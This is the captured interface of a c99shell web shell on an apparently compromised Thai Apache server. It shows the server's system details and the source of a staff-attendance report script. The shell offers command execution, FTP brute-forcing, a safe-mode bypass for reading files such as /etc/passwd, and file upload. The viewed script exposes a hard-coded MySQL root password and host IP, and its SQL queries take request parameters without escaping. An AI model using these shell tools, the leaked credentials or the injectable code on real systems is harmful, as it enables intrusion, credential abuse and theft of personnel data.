!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     report.php (11.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
            
            
/**  using 'Att' DB  */
         
include("../class/conn.php");
        include(
"../include/config.inc.php");
        
    
    
/**  Create Database Object  */
    
$dbObj = new DBConn;
    
ConnectDB();
        
    
    
    
$month = ($_REQUEST['month'])?$_REQUEST['month']:date("n");
    
$year = ($_REQUEST['year'])?$_REQUEST['year']:date("Y")+543;
    
$this_month  getDate(mktime(000$month1$year-543));
    
$next_month  getDate(mktime(000$month 11$year-543));
    
$days_in_this_month floor(($next_month[0] - $this_month[0]) / (60 60 24));

    
$sql "select * from TimeSchedule where scheduleName = 'Early'";
    
$link->query($sql);
    
$rs $link->getnext();
    
$earlyTimeStart $rs->timeStart;
    
$earlyTimeFinish $rs->timeFinish;
    
    
$sql "select * from TimeSchedule where scheduleName = 'Late'";
    
$link->query($sql);
    
$rs $link->getnext();
    
$lateTimeStart $rs->timeStart;
    
$lateTimeFinish $rs->timeFinish;
    
    
$sql "select * from TimeSchedule where scheduleName = 'Leave'";
    
$link->query($sql);
    
$rs $link->getnext();
    
$leaveTimeStart $rs->timeStart;
    
$leaveTimeFinish $rs->timeFinish;
    
    } 
# else
?>

<? //if(isset($_REQUEST['reportType']) && $_REQUEST['reportType'] == "month"){

        
$sql "select * from UserType where userTypeID = '".$_REQUEST['usertype']."'";
        
$link->query($sql);
        
$rs $link->getnext();
?>
<form name="report" method="post" onsubmit="return validateReportPersonForm()">
  <table width="600" border="0" class="admintable">
  <tr>
    <td height="48" colspan="4" align="center">
        <span class="menu">
            <? if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['person'])){
                    
$sql "select * from USERINFO where Badgenumber = '".$_REQUEST['person']."' ";
                    
$link->query($sql);
                    
$rs $link->getnext();
            
?>
                    รายงาน <?=$rs->Name;?>  เดือน <?=($_REQUEST['month'])?$ThaiMonth[$_REQUEST['month']-1]:$ThaiMonth[date("n")-1]?> <?=$year;?>
            <? }
                else{
            
?>
                    รายงานแยกตามรายบุคคล
            <? }?>
            
        </span>
    </td>
  </tr>  
  <tr>
    <td width="20%" height="50">&nbsp;</td>
    <td width="51%" align="right" valign="middle">
        <select name="person">
            <? 
                
echo "<option value=\"\">----- เลือกรายชื่อ -----</option>";
                
$sql "select * from USERINFO where userTypeID = '".$_REQUEST['usertype']."' and userStatusID = '1' order by Name ";
                
$link->query($sql);
                while(
$rs $link->getnext()){
                    echo 
"<option value='".$rs->Badgenumber."' ".(($person == $rs->Badgenumber)?"selected":"").">".$rs->Name."</option>";                    
                }
            
?>
        </select>
        <select name="month">
            <? 
                
for($i=0;$i<sizeof($ThaiMonth);$i++){
                    echo 
"<option value='".($i+1)."' ".(($month == $i+1)?"selected":"").">".$ThaiMonth[$i]."</option>";                    
                }
            
?>
        </select>
      <input type="text" name="year" value="<?=$year;?>"  size="4" maxlength="4"/>    </td>
    <td width="10%" align="left" valign="middle">
        <input type="submit" value="ค้นหา" style="cursor:pointer"/>
        <input type="hidden" name="status" value="<?=$_REQUEST['status']?>"/>
        <input type="hidden" name="option" value="report"/>
        <input type="hidden" name="reportType" value="person"/>
        <input type="hidden" name="usertype" value="<?=$_REQUEST['usertype']?>"/>
    </td>
    <td width="19%" align="left" valign="middle">
        <? if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['status'])){?>
        <a href="reportExcel.php?month=<?=$_REQUEST['month']?>&year=<?=$_REQUEST['year']?>&usertype=<?=$_REQUEST['usertype']?>&person=<?=$_REQUEST['person']?>&reportType=person" target="_blank"><img src="images/ico_excel.gif" border="0" title="ดาวน์โหลด excel"/></a>
        <? }?>    </td>
  </tr>
  </table>
</form>

<table height="30" class="report">    
<? 
    
if(isset($_REQUEST['month']) && isset($_REQUEST['year']) && isset($_REQUEST['status'])){
?>
    <tr>
        <td width="160" align="center" valign="middle" class="head">วัน / เดือน  / ปี</td>        
        <td width="120" align="center" valign="middle" class="head">เวลาเข้า</td>
        <td width="120" align="center" valign="middle" class="head">เวลาออก</td>
        <td width="150" align="center" valign="middle" class="head">หมายเหตุ</td>            
    </tr>
<?

        
for($i=1;$i<=$days_in_this_month;$i++){
        
            
$mssql_conn = new mssqldb();
            
$mssql_conn->connect($_config['database']);
            
$mssql_conn->selectdb($_config['database']['database']);
            
            
$ymd = ($year-543)."-".$month."-".$i;
            
$status "";
                
            echo 
"<tr>";
            echo 
"<td align=\"center\" valign=\"middle\">".($i." ".$ThaiMonth[$month-1]." ".$year)."</td>";    
            
            
$timeSplit explode(":",date("H:i:s",strtotime($lateTimeFinish)));
            
$this_date mktime(date("H"),date("i"),date("s"),date("n"),date("j"),date("Y"));
            
$select_date mktime($timeSplit[0],$timeSplit[1],$timeSplit[2],date("n",strtotime($ymd)),date("j",strtotime($ymd)),date("Y",strtotime($ymd)));

            
$sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($earlyTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($earlyTimeFinish))."' order by CHECKINOUT.CHECKTIME asc";    
            
$mssql_conn->query($sql);

            if(
$mssql_conn->num_rows()){                
                
$rs $mssql_conn->getnext();
                
$checkin 1;
                
$checkin_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));  //เข้างานปกติ
            
}
            else{
                
$sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($lateTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($lateTimeFinish))."' order by CHECKINOUT.CHECKTIME asc";
                
$mssql_conn->query($sql);
                
                if(
$mssql_conn->num_rows()){                
                    
$rs $mssql_conn->getnext();
                    
$checkin 2;
                    
$checkin_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));  //เข้างานสาย
                
}
                else{    
                    if(
$select_date $this_date$checkin_time "-";
                    else 
$checkin_time "ไม่ลงเวลาเข้า";
                    
$checkin 3//ขาดงาน
                
}
            }    
            echo 
"<td align=\"center\" valign=\"middle\">".$checkin_time."</td>";
            
            
$this_date mktime(date("H"),date("i"),date("s"),date("n"),date("j"),date("Y"));
            
$select_date mktime(16,30,0,date("n",strtotime($ymd)),date("j",strtotime($ymd)),date("Y",strtotime($ymd)));
            
            
$sql "select * from USERINFO , CHECKINOUT where USERINFO.Badgenumber = '".$_REQUEST['person']."' and USERINFO.USERID = CHECKINOUT.USERID and CHECKINOUT.CHECKTIME >= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($leaveTimeStart))."' and CHECKINOUT.CHECKTIME <= '".date("Y-m-d"strtotime($ymd))." ".date("H:i:s",strtotime($leaveTimeFinish))."' order by CHECKINOUT.CHECKTIME desc";
            
$mssql_conn->query($sql);
            if(
$mssql_conn->num_rows()){
                
$rs $mssql_conn->getnext();
                
$checkout 1//ลงเวลาออก
                
$checkout_time date("H:i" strtotime(substr($rs->CHECKTIME,-7)));
                
$status "-";
            }
            else{
                if(
$select_date $this_date){
                    
$checkout 3;  //ยังไม่มีข้อมูล
                    
$checkout_time "-";
                    
$status "-";
                }
                else{
                    
$checkout 2;  //ไม่ลงเวลาออก
                    
$checkout_time "ไม่ลงเวลาออก";
                }
            }
            echo 
"<td align=\"center\" valign=\"middle\">".$checkout_time."</td>";
            
            
$mysql_conn mysql_connect("202.29.105.4","root","scphc@") or die('Could not connect: ' mysql_error());
            
mysql_select_db("manage_db",$mysql_conn);
            
mysql_query("SET NAMES 'tis620'");

            
$sql "select * from Holiday_SCPHC where holidayDate >= '".date("Y-m-d"strtotime($ymd))."' and holidayDate <= '".date("Y-m-d"strtotime($ymd))."' ";
            
$mssql_conn->query($sql);
            if(
$mssql_conn->num_rows()){
                
$rs $mssql_conn->getnext();
                
$checkin 10;  //วันหยุดราชการ
                
$holidayName $rs->holidayName;
            }                

            
$sql "select * from personal_tb , history_absent , history_absent_tb where personal_tb.Acno = '".$_REQUEST['person']."' and personal_tb.Teacher_code = history_absent_tb.Teacher_code and history_absent_tb.Absent_code = history_absent.Absent_code and history_absent_tb.Date_start <= '".($year."-".$month."-".$i)."' and history_absent_tb.Date_finish >= '".($year."-".$month."-".$i)."' and history_absent_tb.Status = 'อนุญาต' ";
            
$result mysql_query($sql);

            if(
mysql_num_rows($result)){
                
$rs2 mysql_fetch_object($result);
                    
                switch(
$rs2->Absent_code){
                    case 
$checkin 4; break;  //ลากิจ
                    
case $checkin 5; break;  //ลาป่วย
                    
case $checkin 6; break;  //ลาพักผ่อน
                    
case $checkin 7; break;  //ลาคลอดบุตร
                    
case $checkin 8; break;  //ลาอุปสมบท
                
}

            }
            else{
                
$sql "select * from personal_tb , formaoffice where personal_tb.Acno = '".$_REQUEST['person']."' and personal_tb.Teacher_code = formaoffice.Teacher_code and  formaoffice.Date_start <= '".($year."-".$month."-".$i)."' and formaoffice.Date_finish >= '".($year."-".$month."-".$i)."'   and formaoffice.Flag2 = 'อนุมัติ' ";

                
$result mysql_query($sql);

                if(
mysql_num_rows($result)) $checkin 9;  //ไปราชการ
            
}
            
mysql_close($mysql_conn);
                
            
$weekend date("w"strtotime($ymd));                    
            
$this_day mktime(0,0,0,date("m"),date("d"),date("Y"));
            
$compare_day mktime(0,0,0,date("n"strtotime($ymd)),date("d"strtotime($ymd)),date("Y"strtotime($ymd)));

            if(
$checkin == 4$status "ลากิจ";
            else if(
$checkin == 5$status "ลาป่วย";
            else if(
$checkin == 6$status "ลาพักผ่อน";
            else if(
$checkin == 7$status "ลาคลอดบุตร";
            else if(
$checkin == 8$status "ลาอุปสมบท";
            else if(
$checkin == 9$status "ไปราชการ";
            else if(
$checkin == 10$status $holidayName;
            else{
                if(
$weekend == 6)  $status "วันเสาร์";
                if(
$weekend == 0)  $status "วันอาทิตย์";
                if(
$compare_day $this_day$status "-";
                if(
$status == "" && $checkin != 3$status "-";
                if(
$status == "" && $checkin == 3$status "ขาดงาน";
            }
                
            echo 
"<td align=\"center\" valign=\"middle\">".$status."</td>";
            
            echo 
"</tr>";
        }
    }
?>
</table>

<? }?>
<?php 
include("../templates/incFooter.php"); ?>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);

    
/**  Close the Database  */
    
$dbObj->disconn();
    
CloseDB();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]--